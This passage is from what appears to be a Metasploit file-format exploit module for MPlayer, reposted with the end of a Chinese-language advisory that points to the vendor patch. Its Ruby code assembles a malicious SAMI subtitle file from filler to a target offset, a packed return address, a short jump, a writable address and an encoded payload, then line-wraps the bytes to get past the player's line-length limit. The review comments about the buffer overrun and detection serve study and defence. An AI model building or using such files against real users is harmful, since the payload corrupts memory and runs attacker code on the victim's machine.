register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.smi']),
], self.class)
end
# Split the subtitle to avoid mplayer complaining
# about the line max length
def sami_encode(s)
  # Re-emit the input as consecutive chunks of at most 32 characters,
  # each followed by a newline, so no line in the subtitle body is long
  # enough to hit the player's line-length limit. Empty input yields "".
  wrapped = ""
  (0...s.length).step(32) do |offset|
    wrapped << s[offset, 32] << "\n"
  end
  wrapped
end
# Builds the SAMI subtitle file this module emits and hands it to file_create.
#
# The SYNC body is a byte string assembled in a fixed order: random filler
# sized by target['Offset'], target.ret packed as a 32-bit little-endian
# value, the two bytes EB 06, two more random bytes, target['WritableAddress']
# packed the same way, and finally payload.encoded. sami_encode then breaks
# that string into lines of at most 32 characters.
#
# NOTE(review): the vulnerable parser is not shown here; presumably the SYNC
# content overruns a fixed-size buffer in unpatched MPlayer -- confirm against
# the advisory and make sure the vendor update is applied.
# NOTE(review): for detection, the output is a minimal SAMI document (a single
# <SYNC Start=100550> inside <BODY>) whose cue text is binary data wrapped
# every 32 characters rather than readable caption text.
def exploit
# Filler up to the offset defined by the selected target.
sploit = rand_text(target['Offset'])
# "V" packs the value as 4 bytes, little-endian.
sploit << [target.ret].pack("V")
sploit << "\xeb\x06" # jmp short 0x8
sploit << rand_text(2)
sploit << [target['WritableAddress']].pack("V")
sploit << payload.encoded
# Wrap the bytes in the smallest SAMI skeleton: SAMI > BODY > one SYNC cue.
sami = "<SAMI>\n"
sami << "<BODY>\n"
sami << "<SYNC Start=100550>\n"
# Line-wrapped so the player does not reject the cue for its line length.
sami << sami_encode(sploit)
sami << "</SYNC>\n"
sami << "</BODY>\n"
sami << "</SAMI>\n"
# The name shown here is the FILENAME datastore option.
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sami)
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
MPlayer
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: